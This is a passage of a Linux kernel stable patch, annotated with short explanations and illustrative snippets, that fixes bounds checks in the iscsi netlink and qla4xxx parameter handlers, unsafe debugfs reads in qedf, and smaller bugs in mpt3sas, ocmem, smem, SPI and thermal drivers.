++		ioc->base_readl_ext_retry = &_base_readl;
++	}
+ 	r = mpt3sas_base_map_resources(ioc);
+ 	if (r)
+ 		goto out_free_resources;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
+index 05364aa15ecdb..10055c7e4a9f7 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
+@@ -1618,6 +1618,7 @@ struct MPT3SAS_ADAPTER {
+ 	u8		diag_trigger_active;
+ 	u8		atomic_desc_capable;
+ 	BASE_READ_REG	base_readl;
++	BASE_READ_REG	base_readl_ext_retry;
+ 	struct SL_WH_MASTER_TRIGGER_T diag_trigger_master;
+ 	struct SL_WH_EVENT_TRIGGERS_T diag_trigger_event;
+ 	struct SL_WH_SCSI_TRIGGERS_T diag_trigger_scsi;
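The new base_readl_ext_retry hook re-reads the doorbell because some controllers can transiently return 0. Note that, as committed, the "continue" already ends the loop body, so all 30 reads are always issued and the last value is returned. An early-exit variant of the same bounded-retry idea, shown purely as an illustration and not as the driver's code:

    #include <stdint.h>

    /* Illustrative only: stop at the first non-zero read instead of
     * always issuing all 30 reads as the committed helper does. */
    static uint32_t readl_retry(volatile const uint32_t *addr)
    {
            uint32_t val = 0;
            int i;

            for (i = 0; i < 30; i++) {
                    val = *addr;            /* readl() stand-in */
                    if (val != 0)
                            break;          /* first non-zero read wins */
            }
            return val;                     /* 0 only if every read was 0 */
    }
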
+diff --git a/drivers/scsi/qedf/qedf_dbg.h b/drivers/scsi/qedf/qedf_dbg.h
+index f4d81127239eb..5ec2b817c694a 100644
+--- a/drivers/scsi/qedf/qedf_dbg.h
++++ b/drivers/scsi/qedf/qedf_dbg.h
+@@ -59,6 +59,8 @@ extern uint qedf_debug;
+ #define QEDF_LOG_NOTICE	0x40000000	/* Notice logs */
+ #define QEDF_LOG_WARN		0x80000000	/* Warning logs */
+ 
++#define QEDF_DEBUGFS_LOG_LEN (2 * PAGE_SIZE)
++
+ /* Debug context structure */
+ struct qedf_dbg_ctx {
+ 	unsigned int host_no;
+diff --git a/drivers/scsi/qedf/qedf_debugfs.c b/drivers/scsi/qedf/qedf_debugfs.c
+index a3ed681c8ce3f..451fd236bfd05 100644
+--- a/drivers/scsi/qedf/qedf_debugfs.c
++++ b/drivers/scsi/qedf/qedf_debugfs.c
+@@ -8,6 +8,7 @@
+ #include <linux/uaccess.h>
+ #include <linux/debugfs.h>
+ #include <linux/module.h>
++#include <linux/vmalloc.h>
+ 
+ #include "qedf.h"
+ #include "qedf_dbg.h"
+@@ -98,7 +99,9 @@ static ssize_t
+ qedf_dbg_fp_int_cmd_read(struct file *filp, char __user *buffer, size_t count,
+ 			 loff_t *ppos)
+ {
++	ssize_t ret;
+ 	size_t cnt = 0;
++	char *cbuf;
+ 	int id;
+ 	struct qedf_fastpath *fp = NULL;
+ 	struct qedf_dbg_ctx *qedf_dbg =
+@@ -108,19 +111,25 @@ qedf_dbg_fp_int_cmd_read(struct file *filp, char __user *buffer, size_t count,
+ 
+ 	QEDF_INFO(qedf_dbg, QEDF_LOG_DEBUGFS, "entered\n");
+ 
+-	cnt = sprintf(buffer, "\nFastpath I/O completions\n\n");
++	cbuf = vmalloc(QEDF_DEBUGFS_LOG_LEN);
++	if (!cbuf)
++		return 0;
++
++	cnt += scnprintf(cbuf + cnt, QEDF_DEBUGFS_LOG_LEN - cnt, "\nFastpath I/O completions\n\n");
+ 
+ 	for (id = 0; id < qedf->num_queues; id++) {
+ 		fp = &(qedf->fp_array[id]);
+ 		if (fp->sb_id == QEDF_SB_ID_NULL)
+ 			continue;
+-		cnt += sprintf((buffer + cnt), "#%d: %lu\n", id,
+-			       fp->completions);
++		cnt += scnprintf(cbuf + cnt, QEDF_DEBUGFS_LOG_LEN - cnt,
++				 "#%d: %lu\n", id, fp->completions);
+ 	}
+ 
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	ret = simple_read_from_buffer(buffer, count, ppos, cbuf, cnt);
++
++	vfree(cbuf);
++
++	return ret;
+ }
+ 
+ static ssize_t
+@@ -138,15 +147,14 @@ qedf_dbg_debug_cmd_read(struct file *filp, char __user *buffer, size_t count,
+ 			loff_t *ppos)
+ {
+ 	int cnt;
++	char cbuf[32];
+ 	struct qedf_dbg_ctx *qedf_dbg =
+ 				(struct qedf_dbg_ctx *)filp->private_data;
+ 
+ 	QEDF_INFO(qedf_dbg, QEDF_LOG_DEBUGFS, "debug mask=0x%x\n", qedf_debug);
+-	cnt = sprintf(buffer, "debug mask = 0x%x\n", qedf_debug);
++	cnt = scnprintf(cbuf, sizeof(cbuf), "debug mask = 0x%x\n", qedf_debug);
+ 
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	return simple_read_from_buffer(buffer, count, ppos, cbuf, cnt);
+ }
+ 
+ static ssize_t
+@@ -185,18 +193,17 @@ qedf_dbg_stop_io_on_error_cmd_read(struct file *filp, char __user *buffer,
+ 				   size_t count, loff_t *ppos)
+ {
+ 	int cnt;
++	char cbuf[7];
+ 	struct qedf_dbg_ctx *qedf_dbg =
+ 				(struct qedf_dbg_ctx *)filp->private_data;
+ 	struct qedf_ctx *qedf = container_of(qedf_dbg,
+ 	    struct qedf_ctx, dbg_ctx);
+ 
+ 	QEDF_INFO(qedf_dbg, QEDF_LOG_DEBUGFS, "entered\n");
+-	cnt = sprintf(buffer, "%s\n",
++	cnt = scnprintf(cbuf, sizeof(cbuf), "%s\n",
+ 	    qedf->stop_io_on_error ? "true" : "false");
+ 
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	return simple_read_from_buffer(buffer, count, ppos, cbuf, cnt);
+ }
+ 
+ static ssize_t
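These qedf debugfs reads formatted with sprintf() directly into the caller's buffer, which is a user-space pointer, and applied the *ppos arithmetic by hand. The hunks switch to formatting into kernel memory and letting simple_read_from_buffer() do the bounded copy_to_user(). A minimal read handler under that pattern (demo_read and the mask value are illustrative; scnprintf() and simple_read_from_buffer() are the real helpers):

    #include <linux/fs.h>
    #include <linux/kernel.h>

    static ssize_t demo_read(struct file *filp, char __user *ubuf,
                             size_t count, loff_t *ppos)
    {
            char kbuf[32];
            int len;

            /* format into kernel memory first, never into ubuf */
            len = scnprintf(kbuf, sizeof(kbuf), "debug mask = 0x%x\n", 0xffu);

            /* handles *ppos, short reads and the copy_to_user() */
            return simple_read_from_buffer(ubuf, count, ppos, kbuf, len);
    }
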
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index 9fd68d362698f..2ee109fb65616 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -1977,8 +1977,9 @@ static int qedi_cpu_offline(unsigned int cpu)
+ 	struct qedi_percpu_s *p = this_cpu_ptr(&qedi_percpu);
+ 	struct qedi_work *work, *tmp;
+ 	struct task_struct *thread;
++	unsigned long flags;
+ 
+-	spin_lock_bh(&p->p_work_lock);
++	spin_lock_irqsave(&p->p_work_lock, flags);
+ 	thread = p->iothread;
+ 	p->iothread = NULL;
+ 
+@@ -1989,7 +1990,7 @@ static int qedi_cpu_offline(unsigned int cpu)
+ 			kfree(work);
+ 	}
+ 
+-	spin_unlock_bh(&p->p_work_lock);
++	spin_unlock_irqrestore(&p->p_work_lock, flags);
+ 	if (thread)
+ 		kthread_stop(thread);
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index b597c782b95ee..30bbf33e3a6aa 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -5571,7 +5571,7 @@ static void qla_get_login_template(scsi_qla_host_t *vha)
+ 	__be32 *q;
+ 
+ 	memset(ha->init_cb, 0, ha->init_cb_size);
+-	sz = min_t(int, sizeof(struct fc_els_csp), ha->init_cb_size);
++	sz = min_t(int, sizeof(struct fc_els_flogi), ha->init_cb_size);
+ 	rval = qla24xx_get_port_login_templ(vha, ha->init_cb_dma,
+ 					    ha->init_cb, sz);
+ 	if (rval != QLA_SUCCESS) {
+diff --git a/drivers/scsi/qla4xxx/ql4_os.c b/drivers/scsi/qla4xxx/ql4_os.c
+index 9e849f6b0d0f7..3f2f9734ee42e 100644
+--- a/drivers/scsi/qla4xxx/ql4_os.c
++++ b/drivers/scsi/qla4xxx/ql4_os.c
+@@ -968,6 +968,11 @@ static int qla4xxx_set_chap_entry(struct Scsi_Host *shost, void *data, int len)
+ 	memset(&chap_rec, 0, sizeof(chap_rec));
+ 
+ 	nla_for_each_attr(attr, data, len, rem) {
++		if (nla_len(attr) < sizeof(*param_info)) {
++			rc = -EINVAL;
++			goto exit_set_chap;
++		}
++
+ 		param_info = nla_data(attr);
+ 
+ 		switch (param_info->param) {
+@@ -2750,6 +2755,11 @@ qla4xxx_iface_set_param(struct Scsi_Host *shost, void *data, uint32_t len)
+ 	}
+ 
+ 	nla_for_each_attr(attr, data, len, rem) {
++		if (nla_len(attr) < sizeof(*iface_param)) {
++			rval = -EINVAL;
++			goto exit_init_fw_cb;
++		}
++
+ 		iface_param = nla_data(attr);
+ 
+ 		if (iface_param->param_type == ISCSI_NET_PARAM) {
+@@ -8104,6 +8114,11 @@ qla4xxx_sysfs_ddb_set_param(struct iscsi_bus_flash_session *fnode_sess,
+ 
+ 	memset((void *)&chap_tbl, 0, sizeof(chap_tbl));
+ 	nla_for_each_attr(attr, data, len, rem) {
++		if (nla_len(attr) < sizeof(*fnode_param)) {
++			rc = -EINVAL;
++			goto exit_set_param;
++		}
++
+ 		fnode_param = nla_data(attr);
+ 
+ 		switch (fnode_param->param) {
+diff --git a/drivers/scsi/scsi_transport_iscsi.c b/drivers/scsi/scsi_transport_iscsi.c
+index bf834e72595a3..49dbcd67579aa 100644
+--- a/drivers/scsi/scsi_transport_iscsi.c
++++ b/drivers/scsi/scsi_transport_iscsi.c
+@@ -3013,14 +3013,15 @@ iscsi_if_destroy_conn(struct iscsi_transport *transport, struct iscsi_uevent *ev
+ }
+ 
+ static int
+-iscsi_set_param(struct iscsi_transport *transport, struct iscsi_uevent *ev)
++iscsi_if_set_param(struct iscsi_transport *transport, struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	char *data = (char*)ev + sizeof(*ev);
+ 	struct iscsi_cls_conn *conn;
+ 	struct iscsi_cls_session *session;
+ 	int err = 0, value = 0, state;
+ 
+-	if (ev->u.set_param.len > PAGE_SIZE)
++	if (ev->u.set_param.len > rlen ||
++	    ev->u.set_param.len > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	session = iscsi_session_lookup(ev->u.set_param.sid);
+@@ -3028,6 +3029,10 @@ iscsi_set_param(struct iscsi_transport *transport, struct iscsi_uevent *ev)
+ 	if (!conn || !session)
+ 		return -EINVAL;
+ 
++	/* data will be regarded as NULL-ended string, do length check */
++	if (strlen(data) > ev->u.set_param.len)
++		return -EINVAL;
++
+ 	switch (ev->u.set_param.param) {
+ 	case ISCSI_PARAM_SESS_RECOVERY_TMO:
+ 		sscanf(data, "%d", &value);
+@@ -3117,7 +3122,7 @@ put_ep:
+ 
+ static int
+ iscsi_if_transport_ep(struct iscsi_transport *transport,
+-		      struct iscsi_uevent *ev, int msg_type)
++		      struct iscsi_uevent *ev, int msg_type, u32 rlen)
+ {
+ 	struct iscsi_endpoint *ep;
+ 	int rc = 0;
+@@ -3125,7 +3130,10 @@ iscsi_if_transport_ep(struct iscsi_transport *transport,
+ 	switch (msg_type) {
+ 	case ISCSI_UEVENT_TRANSPORT_EP_CONNECT_THROUGH_HOST:
+ 	case ISCSI_UEVENT_TRANSPORT_EP_CONNECT:
+-		rc = iscsi_if_ep_connect(transport, ev, msg_type);
++		if (rlen < sizeof(struct sockaddr))
++			rc = -EINVAL;
++		else
++			rc = iscsi_if_ep_connect(transport, ev, msg_type);
+ 		break;
+ 	case ISCSI_UEVENT_TRANSPORT_EP_POLL:
+ 		if (!transport->ep_poll)
+@@ -3149,12 +3157,15 @@ iscsi_if_transport_ep(struct iscsi_transport *transport,
+ 
+ static int
+ iscsi_tgt_dscvr(struct iscsi_transport *transport,
+-		struct iscsi_uevent *ev)
++		struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	struct Scsi_Host *shost;
+ 	struct sockaddr *dst_addr;
+ 	int err;
+ 
++	if (rlen < sizeof(*dst_addr))
++		return -EINVAL;
++
+ 	if (!transport->tgt_dscvr)
+ 		return -EINVAL;
+ 
+@@ -3175,7 +3186,7 @@ iscsi_tgt_dscvr(struct iscsi_transport *transport,
+ 
+ static int
+ iscsi_set_host_param(struct iscsi_transport *transport,
+-		     struct iscsi_uevent *ev)
++		     struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	char *data = (char*)ev + sizeof(*ev);
+ 	struct Scsi_Host *shost;
+@@ -3184,7 +3195,8 @@ iscsi_set_host_param(struct iscsi_transport *transport,
+ 	if (!transport->set_host_param)
+ 		return -ENOSYS;
+ 
+-	if (ev->u.set_host_param.len > PAGE_SIZE)
++	if (ev->u.set_host_param.len > rlen ||
++	    ev->u.set_host_param.len > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	shost = scsi_host_lookup(ev->u.set_host_param.host_no);
+@@ -3194,6 +3206,10 @@ iscsi_set_host_param(struct iscsi_transport *transport,
+ 		return -ENODEV;
+ 	}
+ 
++	/* see similar check in iscsi_if_set_param() */
++	if (strlen(data) > ev->u.set_host_param.len)
++		return -EINVAL;
++
+ 	err = transport->set_host_param(shost, ev->u.set_host_param.param,
+ 					data, ev->u.set_host_param.len);
+ 	scsi_host_put(shost);
+@@ -3201,12 +3217,15 @@ iscsi_set_host_param(struct iscsi_transport *transport,
+ }
+ 
+ static int
+-iscsi_set_path(struct iscsi_transport *transport, struct iscsi_uevent *ev)
++iscsi_set_path(struct iscsi_transport *transport, struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	struct Scsi_Host *shost;
+ 	struct iscsi_path *params;
+ 	int err;
+ 
++	if (rlen < sizeof(*params))
++		return -EINVAL;
++
+ 	if (!transport->set_path)
+ 		return -ENOSYS;
+ 
+@@ -3266,12 +3285,15 @@ iscsi_set_iface_params(struct iscsi_transport *transport,
+ }
+ 
+ static int
+-iscsi_send_ping(struct iscsi_transport *transport, struct iscsi_uevent *ev)
++iscsi_send_ping(struct iscsi_transport *transport, struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	struct Scsi_Host *shost;
+ 	struct sockaddr *dst_addr;
+ 	int err;
+ 
++	if (rlen < sizeof(*dst_addr))
++		return -EINVAL;
++
+ 	if (!transport->send_ping)
+ 		return -ENOSYS;
+ 
+@@ -3769,13 +3791,12 @@ exit_host_stats:
+ }
+ 
+ static int iscsi_if_transport_conn(struct iscsi_transport *transport,
+-				   struct nlmsghdr *nlh)
++				   struct nlmsghdr *nlh, u32 pdu_len)
+ {
+ 	struct iscsi_uevent *ev = nlmsg_data(nlh);
+ 	struct iscsi_cls_session *session;
+ 	struct iscsi_cls_conn *conn = NULL;
+ 	struct iscsi_endpoint *ep;
+-	uint32_t pdu_len;
+ 	int err = 0;
+ 
+ 	switch (nlh->nlmsg_type) {
+@@ -3860,8 +3881,6 @@ static int iscsi_if_transport_conn(struct iscsi_transport *transport,
+ 
+ 		break;
+ 	case ISCSI_UEVENT_SEND_PDU:
+-		pdu_len = nlh->nlmsg_len - sizeof(*nlh) - sizeof(*ev);
+-
+ 		if ((ev->u.send_pdu.hdr_size > pdu_len) ||
+ 		    (ev->u.send_pdu.data_size > (pdu_len - ev->u.send_pdu.hdr_size))) {
+ 			err = -EINVAL;
+@@ -3891,6 +3910,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 	struct iscsi_internal *priv;
+ 	struct iscsi_cls_session *session;
+ 	struct iscsi_endpoint *ep = NULL;
++	u32 rlen;
+ 
+ 	if (!netlink_capable(skb, CAP_SYS_ADMIN))
+ 		return -EPERM;
+@@ -3910,6 +3930,13 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 
+ 	portid = NETLINK_CB(skb).portid;
+ 
++	/*
++	 * Even though the remaining payload may not be regarded as nlattr,
++	 * (like address or something else), calculate the remaining length
++	 * here to ease following length checks.
++	 */
++	rlen = nlmsg_attrlen(nlh, sizeof(*ev));
++
+ 	switch (nlh->nlmsg_type) {
+ 	case ISCSI_UEVENT_CREATE_SESSION:
+ 		err = iscsi_if_create_session(priv, ep, ev,
+@@ -3966,7 +3993,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 			err = -EINVAL;
+ 		break;
+ 	case ISCSI_UEVENT_SET_PARAM:
+-		err = iscsi_set_param(transport, ev);
++		err = iscsi_if_set_param(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_CREATE_CONN:
+ 	case ISCSI_UEVENT_DESTROY_CONN:
+@@ -3974,7 +4001,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 	case ISCSI_UEVENT_START_CONN:
+ 	case ISCSI_UEVENT_BIND_CONN:
+ 	case ISCSI_UEVENT_SEND_PDU:
+-		err = iscsi_if_transport_conn(transport, nlh);
++		err = iscsi_if_transport_conn(transport, nlh, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_GET_STATS:
+ 		err = iscsi_if_get_stats(transport, nlh);
+@@ -3983,23 +4010,22 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 	case ISCSI_UEVENT_TRANSPORT_EP_POLL:
+ 	case ISCSI_UEVENT_TRANSPORT_EP_DISCONNECT:
+ 	case ISCSI_UEVENT_TRANSPORT_EP_CONNECT_THROUGH_HOST:
+-		err = iscsi_if_transport_ep(transport, ev, nlh->nlmsg_type);
++		err = iscsi_if_transport_ep(transport, ev, nlh->nlmsg_type, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_TGT_DSCVR:
+-		err = iscsi_tgt_dscvr(transport, ev);
++		err = iscsi_tgt_dscvr(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_SET_HOST_PARAM:
+-		err = iscsi_set_host_param(transport, ev);
++		err = iscsi_set_host_param(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_PATH_UPDATE:
+-		err = iscsi_set_path(transport, ev);
++		err = iscsi_set_path(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_SET_IFACE_PARAMS:
+-		err = iscsi_set_iface_params(transport, ev,
+-					     nlmsg_attrlen(nlh, sizeof(*ev)));
++		err = iscsi_set_iface_params(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_PING:
+-		err = iscsi_send_ping(transport, ev);
++		err = iscsi_send_ping(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_GET_CHAP:
+ 		err = iscsi_get_chap(transport, nlh);
+@@ -4008,13 +4034,10 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 		err = iscsi_delete_chap(transport, ev);
+ 		break;
+ 	case ISCSI_UEVENT_SET_FLASHNODE_PARAMS:
+-		err = iscsi_set_flashnode_param(transport, ev,
+-						nlmsg_attrlen(nlh,
+-							      sizeof(*ev)));
++		err = iscsi_set_flashnode_param(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_NEW_FLASHNODE:
+-		err = iscsi_new_flashnode(transport, ev,
+-					  nlmsg_attrlen(nlh, sizeof(*ev)));
++		err = iscsi_new_flashnode(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_DEL_FLASHNODE:
+ 		err = iscsi_del_flashnode(transport, ev);
+@@ -4029,8 +4052,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 		err = iscsi_logout_flashnode_sid(transport, ev);
+ 		break;
+ 	case ISCSI_UEVENT_SET_CHAP:
+-		err = iscsi_set_chap(transport, ev,
+-				     nlmsg_attrlen(nlh, sizeof(*ev)));
++		err = iscsi_set_chap(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_GET_HOST_STATS:
+ 		err = iscsi_get_host_stats(transport, nlh);
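Across these handlers the payload remaining after the iscsi_uevent header is computed once as rlen = nlmsg_attrlen(nlh, sizeof(*ev)), every user-supplied length field is checked against it, and string payloads must additionally terminate within the claimed length. A stricter strnlen()-based model of that validation (plain C, not the netlink API):

    #include <stddef.h>
    #include <string.h>

    /* claimed_len comes from the message body, rlen from the actual
     * number of bytes received; never trust the former past the latter. */
    int check_param(const char *data, size_t claimed_len, size_t rlen)
    {
            if (claimed_len > rlen)         /* claims more than was received */
                    return -1;
            if (strnlen(data, claimed_len) >= claimed_len)
                    return -1;              /* no NUL inside the bound */
            return 0;
    }
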
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 83d09c2009280..7a1dc5c7c49ee 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1568,6 +1568,8 @@ static int storvsc_device_configure(struct scsi_device *sdevice)
+ {
+ 	blk_queue_rq_timeout(sdevice->request_queue, (storvsc_timeout * HZ));
+ 
++	/* storvsc devices don't support MAINTENANCE_IN SCSI cmd */
++	sdevice->no_report_opcodes = 1;
+ 	sdevice->no_write_same = 1;
+ 
+ 	/*
+diff --git a/drivers/soc/qcom/ocmem.c b/drivers/soc/qcom/ocmem.c
+index c92d26b73e6fc..27c668eac9647 100644
+--- a/drivers/soc/qcom/ocmem.c
++++ b/drivers/soc/qcom/ocmem.c
+@@ -76,8 +76,12 @@ struct ocmem {
+ #define OCMEM_REG_GFX_MPU_START			0x00001004
+ #define OCMEM_REG_GFX_MPU_END			0x00001008
+ 
+-#define OCMEM_HW_PROFILE_NUM_PORTS(val)		FIELD_PREP(0x0000000f, (val))
+-#define OCMEM_HW_PROFILE_NUM_MACROS(val)	FIELD_PREP(0x00003f00, (val))
++#define OCMEM_HW_VERSION_MAJOR(val)		FIELD_GET(GENMASK(31, 28), val)
++#define OCMEM_HW_VERSION_MINOR(val)		FIELD_GET(GENMASK(27, 16), val)
++#define OCMEM_HW_VERSION_STEP(val)		FIELD_GET(GENMASK(15, 0), val)
++
++#define OCMEM_HW_PROFILE_NUM_PORTS(val)		FIELD_GET(0x0000000f, (val))
++#define OCMEM_HW_PROFILE_NUM_MACROS(val)	FIELD_GET(0x00003f00, (val))
+ 
+ #define OCMEM_HW_PROFILE_LAST_REGN_HALFSIZE	0x00010000
+ #define OCMEM_HW_PROFILE_INTERLEAVING		0x00020000
+@@ -355,6 +359,12 @@ static int ocmem_dev_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
++	reg = ocmem_read(ocmem, OCMEM_REG_HW_VERSION);
++	dev_dbg(dev, "OCMEM hardware version: %lu.%lu.%lu\n",
++		OCMEM_HW_VERSION_MAJOR(reg),
++		OCMEM_HW_VERSION_MINOR(reg),
++		OCMEM_HW_VERSION_STEP(reg));
++
+ 	reg = ocmem_read(ocmem, OCMEM_REG_HW_PROFILE);
+ 	ocmem->num_ports = OCMEM_HW_PROFILE_NUM_PORTS(reg);
+ 	ocmem->num_macros = OCMEM_HW_PROFILE_NUM_MACROS(reg);
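The ocmem macros previously used FIELD_PREP(), which packs a value into a masked field, where the code needs FIELD_GET(), which extracts the field from a register word; for NUM_MACROS, whose mask is shifted, the two differ and the count came out wrong. A compile-in-tree sketch of both directions (the mask name is illustrative):

    #include <linux/bitfield.h>
    #include <linux/bits.h>
    #include <linux/types.h>

    #define NUM_PORTS_MASK  GENMASK(3, 0)           /* 0x0000000f */

    void demo(void)
    {
            u32 reg = FIELD_PREP(NUM_PORTS_MASK, 5);        /* pack: reg = 0x5 */
            u32 ports = FIELD_GET(NUM_PORTS_MASK, reg);     /* extract: ports = 5 */

            (void)ports;
    }
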
+diff --git a/drivers/soc/qcom/smem.c b/drivers/soc/qcom/smem.c
+index 4f163d62942c1..af8d90efd91fa 100644
+--- a/drivers/soc/qcom/smem.c
++++ b/drivers/soc/qcom/smem.c
+@@ -723,7 +723,7 @@ EXPORT_SYMBOL(qcom_smem_get_free_space);
+ 
+ static bool addr_in_range(void __iomem *base, size_t size, void *addr)
+ {
+-	return base && (addr >= base && addr < base + size);
++	return base && ((void __iomem *)addr >= base && (void __iomem *)addr < base + size);
+ }
+ 
+ /**
+diff --git a/drivers/spi/spi-tegra20-sflash.c b/drivers/spi/spi-tegra20-sflash.c
+index 220ee08c4a06c..d4bebb4314172 100644
+--- a/drivers/spi/spi-tegra20-sflash.c
++++ b/drivers/spi/spi-tegra20-sflash.c
+@@ -455,7 +455,11 @@ static int tegra_sflash_probe(struct platform_device *pdev)
+ 		goto exit_free_master;
+ 	}
+ 
+-	tsd->irq = platform_get_irq(pdev, 0);
++	ret = platform_get_irq(pdev, 0);
++	if (ret < 0)
++		goto exit_free_master;
++	tsd->irq = ret;
++
+ 	ret = request_irq(tsd->irq, tegra_sflash_isr, 0,
+ 			dev_name(&pdev->dev), tsd);
+ 	if (ret < 0) {
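platform_get_irq() returns a negative errno on failure, so storing it straight into tsd->irq and handing it to request_irq() swallowed the error. The fix is the standard idiom, sketched with the probe body trimmed to the relevant lines:

    #include <linux/platform_device.h>
    #include <linux/interrupt.h>

    int demo_probe(struct platform_device *pdev)
    {
            int irq = platform_get_irq(pdev, 0);

            if (irq < 0)            /* propagates -EPROBE_DEFER et al. */
                    return irq;
            /* ... request_irq(irq, ...) only with a valid number ... */
            return 0;
    }
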
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 5f9aedd1f0b65..151fef199c380 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -4370,6 +4370,11 @@ static int of_spi_notify(struct notifier_block *nb, unsigned long action,
+ 			return NOTIFY_OK;
+ 		}
+ 
++		/*
++		 * Clear the flag before adding the device so that fw_devlink
++		 * doesn't skip adding consumers to this device.
++		 */
++		rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 		spi = of_register_spi_device(ctlr, rd->dn);
+ 		put_device(&ctlr->dev);
+ 
+diff --git a/drivers/staging/fbtft/fb_ili9341.c b/drivers/staging/fbtft/fb_ili9341.c
+index 9ccd0823c3ab3..47e72b87d76d9 100644
+--- a/drivers/staging/fbtft/fb_ili9341.c
++++ b/drivers/staging/fbtft/fb_ili9341.c
+@@ -145,7 +145,7 @@ static struct fbtft_display display = {
+ 	},
+ };
+ 
+-FBTFT_REGISTER_DRIVER(DRVNAME, "ilitek,ili9341", &display);
++FBTFT_REGISTER_SPI_DRIVER(DRVNAME, "ilitek", "ili9341", &display);
+ 
+ MODULE_ALIAS("spi:" DRVNAME);
+ MODULE_ALIAS("platform:" DRVNAME);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index 82806f198074a..a9bd1e71ea487 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -120,7 +120,7 @@ static const struct rkvdec_coded_fmt_desc rkvdec_coded_fmts[] = {
+ 			.max_width = 4096,
+ 			.step_width = 16,
+ 			.min_height = 48,
+-			.max_height = 2304,
++			.max_height = 2560,
+ 			.step_height = 16,
+ 		},
+ 		.ctrls = &rkvdec_h264_ctrls,
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index aacba30bc10c1..762d1990180bf 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -409,13 +409,13 @@ static int __thermal_of_unbind(struct device_node *map_np, int index, int trip_i
+ 	ret = of_parse_phandle_with_args(map_np, "cooling-device", "#cooling-cells",
+ 					 index, &cooling_spec);
+ 
+-	of_node_put(cooling_spec.np);
+-
+ 	if (ret < 0) {
+ 		pr_err("Invalid cooling-device entry\n");
+ 		return ret;
+ 	}
+ 
++	of_node_put(cooling_spec.np);
++
+ 	if (cooling_spec.args_count < 2) {
+ 		pr_err("wrong reference to cooling device, missing limits\n");
+ 		return -EINVAL;
+@@ -442,13 +442,13 @@ static int __thermal_of_bind(struct device_node *map_np, int index, int trip_id,
+ 	ret = of_parse_phandle_with_args(map_np, "cooling-device", "#cooling-cells",
+ 					 index, &cooling_spec);
+ 
+-	of_node_put(cooling_spec.np);
+-
+ 	if (ret < 0) {
+ 		pr_err("Invalid cooling-device entry\n");
+ 		return ret;
+ 	}
+ 
++	of_node_put(cooling_spec.np);
++
+ 	if (cooling_spec.args_count < 2) {
+ 		pr_err("wrong reference to cooling device, missing limits\n");
+ 		return -EINVAL;
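of_parse_phandle_with_args() only populates the args struct, and only takes the reference on its np member, when it succeeds; putting cooling_spec.np before the error check therefore operated on an uninitialized pointer. The safe ordering, sketched:

    #include <linux/of.h>

    int demo(struct device_node *map_np, int index)
    {
            struct of_phandle_args spec;
            int ret;

            ret = of_parse_phandle_with_args(map_np, "cooling-device",
                                             "#cooling-cells", index, &spec);
            if (ret < 0)
                    return ret;     /* spec.np never set: nothing to put */

            /* ... consume spec.args ... */
            of_node_put(spec.np);   /* drop the reference taken on success */
            return 0;
    }
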
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 8411a0f312db0..21145eb8f2a9c 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
